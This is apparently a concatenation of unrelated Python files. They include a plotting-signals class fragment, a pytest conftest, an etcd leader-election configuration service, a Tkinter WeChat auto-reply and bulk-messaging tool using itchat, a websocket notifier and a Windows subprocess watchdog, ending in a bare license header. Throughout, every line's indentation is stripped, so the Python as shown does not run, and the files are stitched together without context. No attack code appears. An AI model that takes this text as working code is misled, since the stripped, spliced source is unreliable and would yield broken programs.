self.csv_stdev.columns = [s + '/Stdev' for s in self.csv_stdev.columns]
self.csv_min = csv_group.min()
self.csv_min.columns = [s + '/Min' for s in self.csv_min.columns]
self.csv_max = csv_group.max()
self.csv_max.columns = [s + '/Max' for s in self.csv_max.columns]
# get the indices from the file with the least number of indices and which is not an evaluation worker
file_with_min_indices = transformed_signals_files[0]
for signals_file in transformed_signals_files:
if signals_file.shape[0] < file_with_min_indices.shape[0] and \
'Training reward' in signals_file.keys():
file_with_min_indices = signals_file
self.index_columns = file_with_min_indices[x_axis_options]
# concat the stats and the indices columns
num_rows = file_with_min_indices.shape[0]
self.csv = pd.concat([self.index_columns, self.csv_mean.head(num_rows), self.csv_stdev.head(num_rows),
self.csv_min.head(num_rows), self.csv_max.head(num_rows)], axis=1)
# remove the stat columns for the indices columns
columns_to_remove = [s + '/Mean' for s in x_axis_options] + \
[s + '/Stdev' for s in x_axis_options] + \
[s + '/Min' for s in x_axis_options] + \
[s + '/Max' for s in x_axis_options]
for col in columns_to_remove:
if col in self.csv.keys():
del self.csv[col]
else: # This is a group of a single file
self.csv = self.signals_files[0].csv
# remove NaNs
self.csv.fillna(value=0, inplace=True) # removing this line will make bollinger bands fail
for key in self.csv.keys():
if 'Stdev' in key and 'Evaluation' not in key:
self.csv[key] = self.csv[key].fillna(value=0)
self.signal_files_need_update = True
def reload_data(self):
SignalsFileBase.reload_data(self)
def update_x_axis_index(self):
SignalsFileBase.update_x_axis_index(self)
# update the x axis for the bollinger bands
for signal in self.signals.values():
if signal.has_bollinger_bands:
signal.set_bands_source()
def toggle_y_axis(self, signal_name=None):
for signal in self.signals.values():
if signal.selected:
signal.toggle_axis()
def change_averaging_window(self, new_size, force=False, signals=None):
SignalsFileBase.change_averaging_window(self, new_size, force, signals)
def set_signal_selection(self, signal_name, val):
self.show_files_separately(self.separate_files)
SignalsFileBase.set_signal_selection(self, signal_name, val)
def file_was_modified_on_disk(self):
for signal_file in self.signals_files:
if signal_file.file_was_modified_on_disk():
return True
return False
def show_files_separately(self, val):
self.separate_files = val
# lazy updating of the signals of each of the workers
if self.separate_files and self.signal_files_need_update:
for signal_file in self.signals_files:
signal_file.update_source_and_signals()
self.signal_files_need_update = False
for signal in self.signals.values():
if signal.selected:
if val:
signal.set_dash("4 4")
else:
signal.set_dash("")
for signal_file in self.signals_files:
try:
if val:
signal_file.set_signal_selection(signal.name, signal.selected)
else:
signal_file.set_signal_selection(signal.name, False)
except:
pass
|
conftest.py
|
import sys
import threading
from functools import partial, wraps
from http.server import SimpleHTTPRequestHandler
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
configurationService.py
|
import etcd3
import logging
import threading
import datetime
import uuid
import traceback
import json
import version
import simpleProducer
DEFAULT_HOST="etcd"
DEFAULT_PORT=2379
DEFAULT_LEADER_KEY = 'leader'
DEFAULT_LEASE_TTL = 5
DEFAULT_SLEEP = 1
DEFAULT_ETCD_ROOT = "CryptoDataAnalyzer"
DIR_VALUE = "."
def combine_path(pathes):
if not pathes:
return
if len(pathes) == 1:
return pathes[0]
path = pathes[0].rstrip("/") + "/"
for part in [p for p in pathes[1:] if p]:
part = part.rstrip("/")
if part:
path += part.rstrip("/") + "/"
if pathes[-1].rstrip("/") == pathes[-1]:
path = path.rstrip("/")
return path
def deserialize(value):
value = value.decode("utf-8")
if value == DIR_VALUE:
return None
try:
result = json.loads(value) if value != None else None
except ValueError:
result = value
return result
class EtcdConfigurationService(object):
def __init__(self, etcd_host, etcd_port, root,
processor_type,
stop_event = None,
id=None,
leader_election_enabled=True,
registration_enabled=True):
self._id = id or uuid.uuid1()
self._etcd_host = etcd_host
self._etcd_port = etcd_port
self.root = combine_path([root, processor_type])
self.leader_key = combine_path([self.root, DEFAULT_LEADER_KEY])
self._processor_type = processor_type
self._register_lease = None
self.leader_event = threading.Event()
self.work_callback = lambda leader: True
self.leader_callback = lambda: True
self.follower_callback = lambda: True
self.register_callback = lambda: True
self._client = etcd3.client(host=self._etcd_host,
port=self._etcd_port)
self._leader_election_enabled = leader_election_enabled
self._registration_enabled = registration_enabled
if self._registration_enabled:
self._stop = stop_event
self._thread = threading.Thread(target=self._run, daemon = True)
self._service_client = etcd3.client(host=self._etcd_host,
port=self._etcd_port)
if not self._stop:
raise Exception("Stop event is mandatory if registration is enabled")
def start(self):
serv_dir = combine_path([self.root, "services"])
self._mkdir(self._service_client, serv_dir)
self._thread.start()
def stop(self):
self._stop.set()
def _put_not_exist(self, client, key, value, lease=None):
status, _ = client.transaction(
compare=[
client.transactions.version(key) == 0
],
success=[
client.transactions.put(key, value, lease)
],
failure=[],
)
return status
def _leader_election(self):
lease = None
value = simpleProducer.value_serializer({
"id" : self._id,
"election_time" : datetime.datetime.now()
})
try:
lease = self._service_client.lease(DEFAULT_LEASE_TTL)
if self._leader_election_enabled:
status = self._put_not_exist(self._service_client, self.leader_key, value, lease)
else:
status = True
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
status = False
return status, lease
def _mkdir(self, client, path, ephemeral=False, lease=None):
if ephemeral:
lease = self._register_lease
parts = path.split("/")
directory = ""
for part in parts:
if directory != "":
directory += "/"
directory += part
self._put_not_exist(client, directory, DIR_VALUE, lease)
def _register(self):
if not self._registration_enabled:
return
serv_dir = combine_path([self.root, "services", str(self._id)])
key = combine_path([serv_dir,"id"])
value = simpleProducer.value_serializer({
"id" : self._id,
"version" : version.__version__,
"start_time" : datetime.datetime.now()
})
try:
lease = self._service_client.lease(DEFAULT_LEASE_TTL)
self._mkdir(self._service_client, serv_dir, lease=lease)
self._service_client.put(key, value, lease)
logging.info('registred {} id: {} v: {}'.format(
self._processor_type, self._id, version.__version__))
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
return lease
def put_config(self, path, key, value):
serv_dir = combine_path(["config", path])
self.put(serv_dir, key, value, ephemeral=False)
def del_config(self, path, key):
path = combine_path(["config", path, key])
self.delete(path)
def get_config(self, path):
path = combine_path(["config", path, "/"])
return self.get(path)
def put_status(self, path, key, value, lease=None):
serv_dir = combine_path(["services", str(self._id), path])
if lease:
self.put(serv_dir, key, value, lease=lease)
else:
self.put(serv_dir, key, value, ephemeral=True)
def del_status(self, path, key):
path = combine_path(["services", str(self._id), path, key])
self.delete(path)
def get_status(self, path):
path = combine_path(["services", str(self._id), path, "/"])
return self.get(path)
def put(self, path, key, value, ephemeral=True, lease=None):
if not (self._thread.is_alive() and self._register_lease):
return False
path = combine_path([self.root, path])
key = combine_path([path, key])
value = simpleProducer.value_serializer(value)
logging.debug("put {}: {}, ephemeral: {}".format(key, value, ephemeral))
if ephemeral:
lease = self._register_lease
try:
self._mkdir(self._client, key, ephemeral)
self._client.put(key, value, lease)
except Exception as ex:
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
return False
return True
def delete(self, path):
path = combine_path([self.root, path])
logging.debug("delete {}".format(path))
self._client.delete(path)
def get(self, path):
path = combine_path([self.root, path])
logging.debug("get {}".format(path))
data = self._client.get_prefix(path)
kv = {}
metadata = {}
for datum in data:
value = deserialize(datum[0])
if not value:
continue
metadatum = datum[1]
key = metadatum.key.decode("utf-8")
kv[key] = value
metadata[key] = metadatum
logging.debug("got {}".format(str(kv)))
return kv, metadata
def _run_work(self, leader, leader_lease=None):
self._register_lease.refresh()
self.work_callback(leader)
def _run(self):
try:
self._register_lease = self._register()
self.register_callback()
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._register_lease = None
return
try:
while not self._stop.is_set():
if self._leader_election_enabled:
logging.info('leader election {}'.format(self._id))
leader, lease = self._leader_election()
if leader:
if self._leader_election_enabled:
logging.info('leader {}'.format(self._id))
self.leader_event.set()
self.leader_callback()
try:
while not self._stop.wait(DEFAULT_SLEEP):
lease.refresh()
self._run_work(leader=True, leader_lease=lease)
return
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
return
finally:
lease.revoke()
else:
logging.info('follower; standby {}'.format(self._id))
election_event = threading.Event()
def watch_cb(event):
if isinstance(event, etcd3.events.DeleteEvent):
election_event.set()
watch_id = self._service_client.add_watch_callback(self.leader_key, watch_cb)
self.follower_callback()
try:
while not election_event.is_set():
if self._stop.wait(DEFAULT_SLEEP):
return
self._run_work(leader=False)
logging.info('new election {}'.format(self._id))
except Exception as ex:
logging.error(ex)
trace = traceback.format_exc()
logging.debug(trace)
return
finally:
self._service_client.cancel_watch(watch_id)
finally:
if self._register_lease:
self._register_lease.revoke()
self._register_lease = None
|
WeChatAssistant.py
|
# -*- coding:utf-8 -*-
"""
实现功能:
1、自动回复
2、图形界面
3、自定义回复内容
4、
"""
import itchat
import re
from tkinter import *
from tkinter import ttk
import tkinter.scrolledtext as tst
import threading
import queue
import time
from basedata import jsonManage
Listen_Flag = False
js = jsonManage()
keyword_dict = {}
group_list = []
frind_dict = {}
q = queue.Queue()
@itchat.msg_register(itchat.content.TEXT)
def text_reply(msg):
print(msg)
if (Listen_Flag == True):
if msg['Type'] == 'Text':
reply_content = msg['Text']
for key, value in keyword_dict.items():
if re.search(key, reply_content):
itchat.send(value, toUserName=msg['FromUserName'])
str = '(%s) -> %s\n' % (
msg.User['NickName'], reply_content)
q.put(str)
@itchat.msg_register(itchat.content.TEXT, isGroupChat=True)
def group_chat_reply(msg):
if (Listen_Flag == True):
if msg.User["NickName"] in group_list:
if msg['Type'] == 'Text':
reply_content = msg['Text']
for key, value in keyword_dict.items():
if re.search(key, reply_content):
itchat.send(value, toUserName=msg['FromUserName'])
str = '【%s】:(%s) -> %s\n' % (msg.User["NickName"],
msg.User.Self['NickName'], reply_content)
q.put(str)
class App(object):
def __init__(self, root):
self.root = root
self.root.size = '440*440'
self.root.title('微信助手')
self.root.geometry('500x500')
self.root.resizable(False,False)
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.tabControl = ttk.Notebook(self.root)
self.tab1 = ttk.Frame(self.tabControl)
self.tab1.columnconfigure(0, weight=1)
self.tab1.rowconfigure(0, weight=1)
self.tabControl.add(self.tab1, text='监控')
self.tab2 = ttk.Frame(self.tabControl)
self.tab2.columnconfigure(0, weight=1)
self.tab2.rowconfigure(0, weight=1)
self.tabControl.add(self.tab2, text='关键词')
self.tab3 = ttk.Frame(self.tabControl)
self.tab3.columnconfigure(0, weight=1)
self.tab3.rowconfigure(0, weight=1)
self.tabControl.add(self.tab3, text='多群发送')
self.tabControl.pack(expand=1, fill=BOTH)
self.tab4 = ttk.Frame(self.tabControl)
self.tab4.columnconfigure(0, weight=1)
self.tab4.rowconfigure(0, weight=1)
self.tabControl.add(self.tab4, text='群发')
self.tabControl.pack(expand=1, fill=BOTH)
# tab1
self.a_mighty = ttk.LabelFrame(self.tab1, text='监控界面 ')
self.a_mighty.pack(fill=BOTH, expand=1)
self.a_listbox1 = tst.ScrolledText(self.a_mighty)
self.a_listbox1.pack(fill=BOTH, expand=1)
self.button_login = Button(self.tab1, text='登陆', command=self.Login_in)
self.button_login.pack(padx=5, pady=0, side=LEFT, anchor=NW)
self.button_listen = Button(
self.tab1, text="启动监控", command=self.Listen_ON)
self.button_listen.pack(padx=5, pady=0, side=LEFT, anchor=NW)
self.button_clear = Button(
self.tab1, text='清空', command=self.ClearMeaaage)
self.button_clear.pack(padx=10, pady=0, side=LEFT, anchor=NW)
# tab2
self.b_mighty = ttk.LabelFrame(self.tab2, text='关键词')
self.b_mighty.pack(fill=BOTH, expand=1)
self.b_listbox1 = Listbox(self.b_mighty, width=33, height=10)
self.b_listbox2 = Listbox(self.b_mighty, width=33, height=10)
self.b_listbox1.pack(padx=5,side=LEFT, anchor=NW,fill=BOTH)
self.b_listbox2.pack(padx=5,side=LEFT, anchor=NW,fill=BOTH)
self.b_lable1 = Label(self.tab2, text="关键字")
self.b_lable1.pack( padx=0, pady=5, side=LEFT)
self.b_key_input = tst.ScrolledText(self.tab2, width=22, height=2)
self.b_key_input.pack( padx=0, pady=5, side=LEFT)
self.b_lable2 = Label(self.tab2, text="回复内容")
self.b_lable2.pack( padx=0, pady=0, side=LEFT)
self.b_value_input = tst.ScrolledText(self.tab2, width=22, height=2)
self.b_value_input.pack( padx=0, pady=0, side=LEFT, anchor=S)
self.button_add_keyword = Button(
self.tab2, text='增加', command=self.AddKeyword)
self.button_add_keyword.pack(padx=0, pady=0, side=TOP, anchor=NW)
self.button_delete_keyword = Button(
self.tab2, text='删除', command=self.DeleteKeyword)
self.button_delete_keyword.pack(padx=0, pady=0, side=LEFT, anchor=S)
# tab3
self.c_mighty = ttk.LabelFrame(self.tab3, text='多群发送')
self.c_mighty.pack(fill=BOTH, expand=1)
self.c_Listname = Listbox(self.c_mighty, selectmode=MULTIPLE)
self.c_Listname.pack(padx=10)
self.c_lable = Label(self.tab3, text="只能检测到未免打扰的群,如果还有未检测到的群,请点击添加到通讯录")
self.c_lable.pack( padx=0, pady=5, side=LEFT)
self.c_input = tst.ScrolledText(self.c_mighty, width=65, height=7)
self.c_input.pack(padx=0, pady=0, side=BOTTOM, anchor=NW)
self.button_send = Button(
self.tab3, text='发送', command=self.SendMessage_thread)
self.button_send.pack(padx=10, pady=0, side=RIGHT, anchor=NW)
# tab4
self.d_mighty = ttk.LabelFrame(self.tab4, text='群发')
self.d_mighty.pack(fill=BOTH, expand=1)
self.d_Listname = Listbox(self.d_mighty, selectmode=MULTIPLE)
self.d_Listname.pack(padx=10)
self.d_input = tst.ScrolledText(self.d_mighty, width=65, height=7)
self.d_input.pack(padx=0, pady=0, side=BOTTOM, anchor=NW)
self.d_button_send = Button(
self.tab4, text='发送', command=self.SendFriend)
self.d_button_send.pack(padx=10, pady=0, side=RIGHT, anchor=NW)
def Login_in(self):
self.thread1 = threading.Thread(target=self.wechat_login)
self.thread1.setDaemon(True)
self.thread1.start()
self.button_login.config(text='退出', command=self.Login_out)
self.button_login['bg'] = 'green'
self.ShowKeyWord()
def Login_out(self):
self.thread = threading.Thread(target=self.wechat_logout)
self.thread.setDaemon(True)
self.thread.start()
self.button_login.config(text='登陆', command=self.Login_in)
self.button_login['bg'] = 'white'
def wechat_login(self):
try:
itchat.auto_login(hotReload=True)
except:
q.put("您的微信未能正确登陆,可能是注册时间太短,微信禁止登陆网页版微信")
chatroomsList =itchat.get_chatrooms()
for chatroom in chatroomsList:
group_list.append(chatroom["NickName"])
js.writejson('groupdata.json',group_list)
self.ShowGroup()
self.ShowFriends()
itchat.run()
def wechat_logout(self):
itchat.logout()
def Listen_ON(self):
global Listen_Flag
if(Listen_Flag == False):
self.button_listen['bg'] = 'green'
self.button_listen.config(text='停止监控', command=self.Listen_OFF)
self.thread = threading.Thread(target=self.ShowMessage)
self.thread.setDaemon(True)
self.thread.start()
Listen_Flag = True
def Listen_OFF(self):
global Listen_Flag
if(Listen_Flag == True):
self.button_listen['bg'] = 'white'
self.button_listen.config(text='启动监控', command=self.Listen_ON)
Listen_Flag = False
def ShowMessage(self):
while(True):
while not q.empty():
str = q.get()
self.a_listbox1.insert(END, str)
self.a_listbox1.see(END)
time.sleep(1)
def ClearMeaaage(self):
self.a_listbox1.delete(1.0, END)
def ShowKeyWord(self):
global keyword_dict
keyword_dict = js.readjson('keyword.json')
self.b_listbox1.delete(0,'end')
self.b_listbox2.delete(0,'end')
for key, value in keyword_dict.items():
self.b_listbox1.insert(END, key)
self.b_listbox2.insert(END, value)
def AddKeyword(self):
global keyword_dict
key = None
value = None
key = self.b_key_input.get(1.0, END)
value = self.b_value_input.get(1.0, END)
if(key.isspace() == True or value.isspace() == True):
key = None
value = None
return
keyword_dict[key] = value
js.writejson('keyword.json',keyword_dict)
self.b_key_input.delete(1.0, END)
self.b_value_input.delete(1.0, END)
self.ShowKeyWord()
def DeleteKeyword(self):
global keyword_dict
for i in range(len(keyword_dict)):
if(self.b_listbox1.selection_includes(i) == True):
key = self.b_listbox1.get(i)
keyword_dict.pop(key)
js.writejson('keyword.json',keyword_dict)
self.ShowKeyWord()
def ShowGroup(self):
self.c_Listname.delete(0,'end')
for group in group_list:
try:
self.c_Listname.insert(END, group)
except:
q.put("您有群的昵称包含表情(emoji),超出此软件的显示范围,您可以修改群名称,去除emoji,请谅解。")
def ShowFriends(self):
friendslist = itchat.get_friends(update=True)[1:]
global frind_dict
for frind in friendslist:
if (frind['RemarkName'] == ''):
frind_dict[frind['NickName']] = frind['NickName']
try:
self.d_Listname.insert(END, frind['NickName'])
except:
q.put("您有好友的昵称包含表情(emoji),超出此软件的显示范围,您可以修改好友备注,去除emoji,请谅解。")
else:
frind_dict[frind['RemarkName']] = frind['NickName']
try:
self.d_Listname.insert(END, frind['RemarkName'])
except:
q.put("您有好友的昵称包含表情(emoji),超出此软件的显示范围,您可以修改好友备注,去除emoji,请谅解。")
print(frind_dict)
def SendFriend(self):
global frind_dict
for i in range(len(frind_dict)):
if(self.d_Listname.selection_includes(i) == True):
key = self.d_Listname.get(i)
value = frind_dict[key]
str = self.d_input.get(1.0, END)
self.d_input.delete(1.0, END)
frind = itchat.search_friends(nickName=value)[0]['UserName']
itchat.send(str,toUserName=frind)
def SendMessage(self):
for i, group in enumerate(group_list):
if(self.c_Listname.selection_includes(i) == True):
groups = itchat.search_chatrooms(name=group)
groupname = groups[0]['UserName']
str = self.c_input.get(1.0, END)
self.c_input.delete(1.0, END)
itchat.send(str, toUserName=groupname)
def SendMessage_thread(self):
self.thread = threading.Thread(target=self.SendMessage)
self.thread.setDaemon(True)
self.thread.start()
def remove_emoji(self, string):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', string)
if __name__ == "__main__":
root = Tk()
tool = App(root)
root.mainloop()
|
ws.py
|
from json import dumps
from logging import getLogger
from os import getenv
from time import sleep
from threading import Thread
from websocket import WebSocketApp
from .ws_settings import ws_settings
PYPLAN_API_HOST = getenv(
'PYPLAN_API_HOST', default='http://pyplanapi:8000/api')
WS_PROTOCOL = 'wss' if 'https' in PYPLAN_API_HOST else 'ws'
WS_URI = f'{WS_PROTOCOL}://{PYPLAN_API_HOST.split("://")[1]}/ws'
logger = getLogger('django')
class WS:
def __init__(self, company_code: str, session_key: str):
self.company_code = company_code
self.session_key = session_key
self.ws = self._start()
def _start(self):
socket_uri = f'{WS_URI}/notifications/{self.company_code}/?sessionKey={self.session_key}'
ws = WebSocketApp(socket_uri, on_open=self._on_open,
on_error=self._on_error, on_close=self._on_close)
def start_run(ws):
ws.run_forever(ping_interval=10)
th = Thread(target=start_run, args=(ws,))
th.start()
return ws
def _on_open(self, ws):
try:
ws.send(dumps({
'command': 'join',
'room': self.session_key,
'message': 'Engine Joining!',
'company_code': self.company_code,
}))
except Exception as ex:
logger.error(f'Error in WebSocket join: {str(ex)}')
def _ensure_ws(self):
if self.ws is None or not self.ws.keep_running:
self._start()
nn = 0
while nn < 10:
if not self.ws is None and self.ws.keep_running:
break
sleep(1)
nn += 1
def _on_close(self, ws):
logger.error(f'WebSocket has closed')
def _on_error(self, ws, error):
logger.error(f'Error in WebSocket: {str(error)}')
def sendMsg(self, message, title=None):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_MESSAGE,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'message': message,
'title': title if not title is None else '',
}))
except Exception as ex:
logger.error(f'Error in WebSocket sendMsg: {str(ex)}')
def progressbar(self, progress, message=None):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_PROGRESSBAR,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'progress': progress,
'message': message if not message is None else ''
}))
except Exception as ex:
logger.error(f'Error in WebSocket send: {str(ex)}')
def sendDebugInfo(self, node, title, action, time=0, usedMemory=0, totalMemory=0, fromDynamic=False):
try:
self._ensure_ws()
self.ws.send(dumps({
'msg_type': ws_settings.MSG_TYPE_DEBUG_MODE_INFO,
'command': 'send',
'room': self.session_key,
'company_code': self.company_code,
'message': '',
'node': node,
'title': title,
'action': action,
'fromDynamic': fromDynamic,
'time': time,
'usedMemory': usedMemory,
'totalMemory': totalMemory
}))
except Exception as ex:
logger.error(f'Error in WebSocket sendDebugInfo: {str(ex)}')
|
WatchDog.py
|
import gc
import os
import sys
import time
import logging
import win32api
import win32job
import win32con
import threading
import subprocess
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
#os.environ['COMSPEC'] = '%SystemRoot%\system32\cmd.exe'
def nope(*args, **kwargs):
pass
class WatchDog(threading.Thread):
TICK_SECONDS = .1
START_SECONDS_DEFAULT = 2
def __init__(self, suproc_command, stdin_queue, stdout_queue, parent, base_dir=None, os_env=None):
threading.Thread.__init__(self)
self.setDaemon(
False) # we want it to survive parent's death so it can detect innactivity and terminate subproccess
self.setName('esstool-watchdog-thd')
self._subproc_command = suproc_command
self._os_env = os_env
self._birthtime = None
self._stopped = False
self._start_failed = False
self._pipe = None
self._stdout_queue = stdout_queue
self._stdin_queue = stdin_queue
self._parent = parent
self._autorestart = True
self._exec_mode_shell = False
self._exec_mode_shell_execution_completed = False
if sys.platform == 'win32':
self._startupinfo = subprocess.STARTUPINFO()
self._startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self._startupinfo.wShowWindow = subprocess.SW_HIDE
self.log = logging.getLogger(self.name)
self.log.handlers = []
self.log.addHandler(logging.NullHandler())
# self.log.propagate = False
self.log.setLevel(logging.INFO)
self.log.debug = nope
self._base_dir = None
try:
if base_dir:
os.chdir(base_dir)
self._base_dir = base_dir
#os.environ["PATH"] += ";"+base_dir
#os.environ["PATH"] += ";"+"C:\Ovation\shc\config"
except Exception as e:
self.log.error("could not change base directory to: %s" % base_dir)
@property
def is_suprocess_started(self):
if self._pipe is None:
return False
if self._pipe.poll() is not None:
return False
return True
@property
def autorestart(self):
return self._autorestart
@property
def shell_execution_completed(self):
if self._exec_mode_shell:
if self._exec_mode_shell_execution_completed:
return True
return False
self.log.error("swatchdog not set for single shell execution")
return False
def enable_autorestart(self):
self._autorestart = True
def disable_autorestart(self):
self._autorestart = False
def set_single_shell_cmd_execution_mode(self):
self.disable_autorestart()
self._exec_mode_shell = True
self._exec_mode_shell_execution_completed = False
self.START_SECONDS_DEFAULT = 0.0001
def start_subproc(self):
close_fds = False if sys.platform == 'win32' else True
if sys.platform == 'win32':
if self._os_env is None:
os_env = os.environ
else:
os_env = self._os_env
#self.log.log(1000, "cmd to open in subproc: %s" % self._subproc_command)
#self.log.log(1000, "cwd: %s" % os.getcwd())
#self.log.log(1000, "env: %s" % os_env)
self._pipe = subprocess.Popen(self._subproc_command.strip(), shell=self._exec_mode_shell, close_fds=close_fds,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
bufsize=0, startupinfo=self._startupinfo, env=os_env)
#self.log.log(1000, "pipe: %s" % self._pipe)
#self.log.log(1000, "pipe.poll(): %s" % self._pipe.poll())
#self.log.log(1000, "is_process_started: %s" % self.is_suprocess_started)
elif sys.platform == 'linux2':
self._pipe = subprocess.Popen(self._subproc_command, shell=self._exec_mode_shell, close_fds=close_fds,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
bufsize=0, env=os.environ, preexec_fn=os.setpgrp)
self._birthtime = time.time()
def poll_on_subproc(self):
close_fds = False if sys.platform == 'win32' else True
try:
while True:
try:
if self._stopped:
self.log.debug("poll on subproc: killing within thread run")
try:
if self._pipe is not None:
self._pipe.terminate()
except WindowsError:
self.log.error("could not kill subprocess; make sure it doesn't remain")
self._pipe = None
return True
else:
if self._pipe.poll() is not None:
if time.time() - self._birthtime < self.START_SECONDS_DEFAULT:
self.log.error('WatchDog(%r) start failed', self.getName())
self._stopped = True
self._pipe = None
self._start_failed = True
return False
elif not self._stopped:
if self._autorestart:
self.log.error('WatchDog(%r) is dead, restarting', self.getName())
self.stop()
if not self.start(blocking=True):
self.log.error("restart failed")
else:
self.log.info("command execution completed")
self._exec_mode_shell_execution_completed = True
self.stop(skip_confirmation=True)
time.sleep(self.TICK_SECONDS)
except Exception as e:
self.log.exception('WatchDog.run error: %r', e)
finally:
try:
self._pipe.terminate()
except (AttributeError, OSError):
pass
def start(self, blocking=False, blocking_timeout_sec=5):
self.log.info("start called")
self._stopped = False
try:
self.start_subproc()
except Exception as e:
self.log.exception("could not start subprocess: %s" % e.message)
raise Exception("initialization failure for cmd: %s in base path: %s" % (self._subproc_command.strip(), self._base_dir))
run_thd = threading.Thread(target=self.poll_on_subproc)
run_thd.daemon = True
run_thd.start()
try:
stdout_thd = threading.Thread(target=self.attach_queue_to_stdout)
stdout_thd.daemon = True
stdout_thd.start()
except AttributeError:
self.stop()
return False
try:
stdin_thd = threading.Thread(target=self.attach_queue_to_stdin)
stdin_thd.daemon = True
stdin_thd.start()
except AttributeError:
self.stop()
return False
# stdout_process_thd = threading.Thread(target=self.process_stdout_output)
# stdout_process_thd.daemon = True
# stdout_process_thd.start()
self.log.log(1000, "is subprocess started: %s" % self.is_suprocess_started)
if blocking:
start_ts = time.time()
while not self.is_suprocess_started:
time.sleep(0.01)
if time.time() - start_ts > blocking_timeout_sec:
self.log.info("not started within confirmation timeout")
return False
return True
def stop(self, skip_confirmation=False):
self.log.info("stop called")
try:
# self.log.info("PID to kill: %s" % self._pipe.pid)
self._stopped = True
if skip_confirmation:
self.log.debug("no confirmation needed, returning")
self._pipe.terminate()
return True
timeout = self.START_SECONDS_DEFAULT
while timeout > 0:
if not self.is_suprocess_started:
self.log.info("confirmed quit within quit timeout")
time.sleep(0.3) #FIXME temporary fix to avoid exceptions due to threads not finished in time
return True
else:
time.sleep(self.TICK_SECONDS)
timeout -= self.TICK_SECONDS
self.log.info("quiting not confirmed within timeout")
return False
except AttributeError:
self.log.exception("could not stop thd")
return False
def attach_queue_to_stdout(self):
start_ts = time.time()
while time.time() - start_ts < self.START_SECONDS_DEFAULT:
if self.is_suprocess_started:
hJob = win32job.CreateJobObject(None, "")
extended_info = win32job.QueryInformationJobObject(hJob, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(hJob, win32job.JobObjectExtendedLimitInformation, extended_info)
perms = win32con.PROCESS_TERMINATE | win32con.PROCESS_SET_QUOTA
hProcess = win32api.OpenProcess(perms, False, self._pipe.pid)
win32job.AssignProcessToJobObject(hJob, hProcess)
self.log.debug("attaching queue to stdout")
while True:
try:
if self._stopped:
break
if self._start_failed:
break
gc.disable()
nextline = self._pipe.stdout.readline()
if nextline == '': # and self._pipe.poll() is not None:
time.sleep(0.05)
continue
self.log.debug("got from stdout: %s" % nextline.strip())
try:
self._stdout_queue.put(nextline.strip())
except Exception as e:
self.log.exception("could not put result to stdout queue, reason: %s" % e.message)
gc.enable()
except AttributeError:
self.log.exception("stdout queue broken")
break
finally:
gc.enable()
#if self._pipe:
# self._pipe.stdout.close()
else:
if not self._stopped:
self.log.warning("pipe is None; can't attach queue to stdout")
time.sleep(0.2)
def attach_queue_to_stdin(self):
start_ts = time.time()
while time.time() - start_ts < self.START_SECONDS_DEFAULT:
try:
if self.is_suprocess_started:
self.log.debug("attaching queue to stdin")
while True:
try:
if self._stopped:
break
if self._start_failed:
break
gc.disable()
input_cmd = self._stdin_queue.get(timeout=.1)
if input_cmd == '': # and self._pipe.poll() is not None:
continue
self.log.debug("writing to stdin: %s" % input_cmd)
self._pipe.stdin.write(input_cmd + '\n')
self._pipe.stdin.flush()
continue
except Empty:
continue
except (IOError, AttributeError):
break
finally:
gc.enable()
#if self._pipe:
# self._pipe.stdin.close()
else:
if not self._stopped:
self.log.warning("pipe is None; can't attach queue to stdin")
time.sleep(0.2)
except KeyboardInterrupt:
pass
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
